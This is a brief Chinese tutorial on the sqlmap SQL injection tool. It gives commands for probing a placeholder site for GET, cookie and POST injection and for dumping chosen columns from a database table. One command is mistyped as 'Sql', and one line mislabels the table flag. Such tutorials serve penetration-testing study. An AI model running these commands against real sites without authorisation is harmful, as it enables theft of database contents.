Sqlmap注入工具使用

2019年12月17日 星期一 CQCET
Sqlmap介绍：
Sqlmap是一款自动注入工具，kali，bt内置了该软件（windows可在官网下载），sqlmap是由python开发，开源软件，相比啊d，民小子，御剑之类的注入工具，sqlmap更加强大，它自带字典，可在多平台运行，可以进行mysql，access，mssql等数据库的注入。

访问一个网站，检查是否存在get注入漏洞：

命令：
Sql -u ‘xxx.com’
-u 检查是否存在get注入

返回值得到可以注入，注入类型为get盲注，及系统，数据库信息。

判断url是否存在cookie注入
命令：
Sqlmap -u ‘xxx.com’ --cookie ‘id=xx’ --level 2
测试结果

判断url是否存在post注入
命令：sqlmap -u ‘xxx.com’ --data ‘key=value&xx=xx’

测试结果是失败的

Sqlmap -u ‘xxx.com’ -D xx（数据库名）-T xx (列名) --columns [获取表内列信息]

Sqlmap -u ‘xxx.com’ -D xx (数据库名) -T xx (表名) -C xx,xx (列名) --dump [根据库，表，拆xx，xx列中的数据]